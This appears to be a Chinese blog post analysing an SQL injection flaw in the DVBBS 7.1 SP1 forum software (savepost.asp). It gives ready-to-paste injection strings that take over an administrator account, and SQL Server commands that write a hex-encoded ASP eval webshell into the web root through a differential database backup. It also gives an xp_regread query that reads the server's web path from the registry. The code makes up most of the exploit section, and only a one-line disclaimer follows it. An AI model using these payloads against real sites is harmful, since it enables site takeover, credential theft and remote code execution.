dvbbs7.1sp1最新漏洞的研究和利用

原创 2006年06月05日 09:27:00
[怪狗] 发表于2006-05-12 00:02
 

动网论坛(DVBBS 7.1.0 SP1)Savepost.asp存在严重漏洞10-May-06
发现:Bug.Center.Team
严重程度:严重
厂商名称:动网论坛(DVBBS)
程序版本:DVBBS 7.1.0 SP1

漏洞分析:
因为程序在savepost.asp文件中变量过滤不严,导致数据库处理产生漏洞,可以取得论坛所有权限以及webshell。已经提交官方审核,并通过确认,补丁已经公布

厂商补丁:
http://bbs.dvbbs.net/dispbbs.asp?boardID=8&ID=1187367&page=1

看到下面:
------------------------------
If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0
    If Buy_UserList<>"" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList,"|||",""),"@@@",""),"$PayMoney","")
    ToolsBuyUser = "0@@@"&Buy_Orders&"@@@"&Buy_VIPType&"@@@"&Buy_UserList&"|||$PayMoney|||"
    GetMoneyType = 3
    'UseTools = ToolsInfo(4)
------------------------------------

再朝下看:
Public Sub Insert_To_Announce()
'插入回复表
DIM UbblistBody
UbblistBody = Content
UbblistBody = Ubblist(Content)
SQL="insert into "&TotalUseTable&"(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values ("&Dvbbs.boardid&","&ParentID&",'"&username&"','"&topic&"','"&Content&"','"&DateTimeStr&"','"&Dvbbs.strlength(Content)&"',"&RootID&","&ilayer&","&iorders&",'"&Dvbbs.UserTrueIP&"','"&Expression(1)&"',"&locktopic&","&signflag&","&mailflag&",0,"&Dvbbs.userid&","&ihaveupfile&","&IsAudit&",'"&UbblistBody&"',"&ToMoney&",'"&UseTools&"','"&ToolsBuyUser&"',"&GetMoneyType&")"
Dvbbs.Execute(sql)

可以看到Buy_UserList这个变量过滤有问题,呵呵,这个变量又导致ToolsBuyUser这个变量有问题。的确是可以注射,呵呵。
在悔过头来看补丁里面:
insert里面有修补:&dvbbs.checkstr(ToolsBuyUser)&"
看来应该是这个地方了。
利用起来最好是sql版本,可以updata改管理员密码,或者差异备份得shell。
利用办法嘛,先注册一个id,找个版面发帖子,
帖子内容下面有个选择帖子类型。
选择---论坛交易币设置。
下面是表单内容。

看源代码:
-------------------------------------
<option value="">选择帖子类型</option>
<option value="0">赠送金币贴</option>
<option value="1">获赠金币贴</option>
<option value="2">论坛交易帖设置</option>
</select>
金币数量:<input name="ToMoney" size="4" value="">
<div id="Buy_setting" style="display:none">
购买数量限制:<input name="Buy_Orders" size="4" value="-1">(设置为“-1”则不限制)<BR>
VIP用户浏览选项:不需要购买<INPUT TYPE="radio" NAME="Buy_VIPType" value="0" checked="checked">,需要购买<input type="radio" name="Buy_VIPType" value="1" /><br />
可购买用户名单限制:<input name="Buy_UserList" size="30" value="" />(每个用户名用英文逗号“,”分隔符分开,注意区分大小写)
</div>
-------------------------------------
就是这个地方了,hoho。
下面有个“可购买名单限制”,里面就填写:
xjy111',0);update/**/Dv_User/**/set/**/UserEmail=(select[Password]from/**/Dv_admin/**/where[Username]='yellowcat')/**/where[UserName]='qq156544632';--

提交成功。
看看我的Email。
晕死,居然成了空白。不知道为什么哈。
来点直接的:

coolidea|||123',0);update/**/Dv_User/**/set/**/UserPassword='469e80d32c0559f8'/**/where[UserName]='qq156544632';--
这回好了,先退出,用admin888这个密码直接成功登录。
好了,语句没有问题,大家现在可以自由发挥,会写工具的,吧delphi什么的搬出来。
直接改管理员的密码进后台,可以恢复数据库的办法得到shell(参考angel的文章,dvbbs7.1sql版本依然可以吧)
或者差异备份(后台可以看到web绝对路径):

create table aspshell (str image);

declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.bak;

insert into aspshell values(0x3C256576616C20726571756573742822232229253E);
declare @a sysname select @a=db_name() backup database @a to disk='D:/wwwroot/dvbbs7sp1/wwwroot/qq156544632.asp' with differential;

drop table aspshell;

另外一种得到web绝对路径办法(从职业欠钱兄弟那里看到的)
create table regread(a varchar(255),b varchar(255));
(建立一个临时表,存放读取到的信息)
insert regread exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/'
(使用xp_regread这个函数读取注册表信息得到虚拟目录路径,并存入临时表中)
update dv_boke_user set boketitle=(select top 1 b from regread) where bokename='admin'

至于acess版本没有研究。

[至于工具,实在没必要写,因为利用起来很简单,把所利用的注入语句复制粘贴一下就可以了。对于动网SQL版,我感觉危害比当初的上传漏洞还要严重,因为操作起来很方便。希望大家本着一种学习技术的心态,不要对存在漏洞的站点实施破坏攻击!!!——
http://aliwy.77169.com

版权声明:本文为博主原创文章,未经博主允许不得转载。

边缘Dvbbs v7.1 SP1 SQL存储过程增强版

  • 2006年04月05日 10:37
  • 3.78MB
  • 下载

动网论坛左右分栏 for dvbbs 7.1sp1

  • 2005年12月27日 09:38
  • 12KB
  • 下载

【系统之家首发】10月最新GhostWin7_SP1旗舰版(64位)电脑公司装机版v2011.10

GhostWin7_SP1旗舰版(64位)电脑公司装机版v2011.10 ■ 概述: Ghost7是指使用Ghost软件做成压缩包的Windows7,俗称克隆版Win7。用克隆版的目的是节省安装时...

dvbbs7.0.0_ac_sp1 (动网最新)

  • 2005年12月27日 09:38
  • 406KB
  • 下载

DedeCMS V5.7 SP1文档关键词频率研究与测试

DedeCMS关键词替换问题较完美解决方案 在DedeCMS V5.7SP1后台"核心→批量维护"下边有个文档关键词维护,它允许添加一些关键词及其对应的链接网址,当发布的文章内容中包含这...

动漫幻想再次美化for DVBBS 7.10 sp1

  • 2005年12月27日 09:38
  • 12.73MB
  • 下载

Win7 SP1 有效利用4G物理内存(一个绝好的东东!!!)

现在的笔记本,配置4G物理内存的有很多,安装的也大多是32位的操作系统。以我为例,笔记本是Thinkpad T410 标配的4G物理内存,安装了Windows 7  SP1 旗舰版。32位的操作系统,...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:dvbbs7.1sp1最新漏洞的研究和利用
举报原因:
原因补充:

(最多只允许输入30个字)